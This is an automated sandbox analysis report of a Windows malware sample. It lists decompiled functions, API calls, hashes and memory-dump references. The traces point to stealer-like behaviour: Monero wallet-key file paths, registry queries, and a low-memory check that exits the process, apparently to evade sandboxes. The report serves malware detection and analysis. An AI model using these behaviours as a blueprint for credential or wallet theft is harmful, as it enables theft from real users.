CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
LocalFree.KERNEL32(0047148F), ref: 00479A90
CloseHandle.KERNEL32(000000FF), ref: 00479A9A

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 66008b071b6194975339f42e17d5fecb39c2fb2b4cd9b68048b0d0bdf50fa993
Instruction ID: e650c839876b6a824f6c435b2c9bcfaa3539d902a7f2b62aedde137387db8f00
Opcode Fuzzy Hash: 66008b071b6194975339f42e17d5fecb39c2fb2b4cd9b68048b0d0bdf50fa993
Instruction Fuzzy Hash: 5731F3B4A00209EFDB14DFA4C885BEE77B9FF48310F108159E905A7390D778AA81CFA5

Function 00484780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0110E1E8), ref: 004847DB

Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

lstrcat.KERNEL32(?,00000000), ref: 00484801
lstrcat.KERNEL32(?,?), ref: 00484820
lstrcat.KERNEL32(?,?), ref: 00484834
lstrcat.KERNEL32(?,010FB720), ref: 00484847
lstrcat.KERNEL32(?,?), ref: 0048485B
lstrcat.KERNEL32(?,0110D7A0), ref: 0048486F

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 00488D90: GetFileAttributesA.KERNEL32(00000000,?,00471B54,?,?,0049564C,?,?,00490E1F), ref: 00488D9F

Part of subcall function 00484570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00484580
Part of subcall function 00484570: RtlAllocateHeap.NTDLL(00000000), ref: 00484587
Part of subcall function 00484570: wsprintfA.USER32 ref: 004845A6
Part of subcall function 00484570: FindFirstFileA.KERNEL32(?,?), ref: 004845BD

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 85e56e5b76043f03a79cfcf8101a99cbf204730188a7f78b8fcafd21a52ff284
Instruction ID: 88c901e6a310bb55aa2c28cd222cc140c3c08222040f05a88a23c4d49be9ab44
Opcode Fuzzy Hash: 85e56e5b76043f03a79cfcf8101a99cbf204730188a7f78b8fcafd21a52ff284
Instruction Fuzzy Hash: 343162F290020867CB15FBB0DC85EED737DAB58704F40498EB31996091EEB897C9CB99

Function 00471220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0047123E
__aulldiv.LIBCMT ref: 00471258
__aulldiv.LIBCMT ref: 00471266
ExitProcess.KERNEL32 ref: 00471294

Strings

@, xrefs: 00471233

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: c169da84fef3fd6c53ca0bb048d8577358745e376a51be03929fc7d38d53a04c
Instruction ID: 21337400f32bcaaf6a722c11d86a3c57503d42cf3020d2a6c658fee0f82be385
Opcode Fuzzy Hash: c169da84fef3fd6c53ca0bb048d8577358745e376a51be03929fc7d38d53a04c
Instruction Fuzzy Hash: 5C016DB0D44308FAEB10EBE4DC49BDEBB78AB04705F20858AE709B62D1D7785941879D

Function 004870D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

memset.MSVCRT ref: 0048716A

Strings

sH, xrefs: 004872AE, 00487179, 0048717C
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0048718C
sH, xrefs: 00487111

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: sH$sH$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-4088985431
Opcode ID: 00b364b34b4e0b618d2e68d6ecb97863dc7afb4eaecefc1f5b2f599b57f49d0c
Instruction ID: 8325a9be4a5fc9841dc896760a25012ce83d8d6d3596aa9f828b515c893129e8
Opcode Fuzzy Hash: 00b364b34b4e0b618d2e68d6ecb97863dc7afb4eaecefc1f5b2f599b57f49d0c
Instruction Fuzzy Hash: FE5180B0D042189FDB14FB90DC95BEEB774AF54304F2044AEE21576281EB786E89CF59

Function 6C5FC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C5FC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C5FC969
GetSystemInfo.KERNEL32(?), ref: 6C5FC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C5FC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C5FC9E2

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 475376844df5551d7afb45b9cdab6082854466c637aa752ef7d9f44141e1a496
Instruction ID: ed733894d13e1abed4816fea1eb0c9aee3edefc086ea93314ce85ced7156a8ba
Opcode Fuzzy Hash: 475376844df5551d7afb45b9cdab6082854466c637aa752ef7d9f44141e1a496
Instruction Fuzzy Hash: CD21FB31701204ABDB149E67CCC4BBE73B9AF86340F50052DF95397B40E77078058B9A

Function 00487E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487E37
RtlAllocateHeap.NTDLL(00000000), ref: 00487E3E
RegOpenKeyExA.KERNEL32(80000002,010FC278,00000000,00020119,?), ref: 00487E5E
RegQueryValueExA.KERNEL32(?,0110D8E0,00000000,00000000,000000FF,000000FF), ref: 00487E7F
RegCloseKey.ADVAPI32(?), ref: 00487E92

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: f4fadb6d3e731b5234ac414ccd7e53943f963fa8f02436acccfbf02e2a98feae
Instruction ID: 395210cb7b00f703fa3c10765d5ff77899ed5d0f77d278b1d8dcf0d60de38417
Opcode Fuzzy Hash: f4fadb6d3e731b5234ac414ccd7e53943f963fa8f02436acccfbf02e2a98feae
Instruction Fuzzy Hash: 71118CB1A44205EBD700DFD4DD59FBFBBB9EB04B00F20465AF605A7280D77858018BA2

Function 004712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004712B4
RtlAllocateHeap.NTDLL(00000000), ref: 004712BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004712D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004712F5
RegCloseKey.ADVAPI32(?), ref: 004712FF

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: cf6d9036ce1eff8a13677519e6179d62cb43cd8a8a0bec070514430646846a0d
Instruction ID: 252718de77c326162cd5f7b0f3908403d9e1cfa78d9ebc9430491b78ac4b67ef
Opcode Fuzzy Hash: cf6d9036ce1eff8a13677519e6179d62cb43cd8a8a0bec070514430646846a0d
Instruction Fuzzy Hash: D60131F9A40208BBDB00DFE4DC49FAEB7BDEB48701F008299FA0597280DA749A418F51

Function 0047A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01108F28,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0047A0BD
LoadLibraryA.KERNEL32(0110D620), ref: 0047A146

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

SetEnvironmentVariableA.KERNEL32(01108F28,00000000,00000000,?,004912D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00490AFE), ref: 0047A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0047A0B2, 0047A0C6, 0047A0DC

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
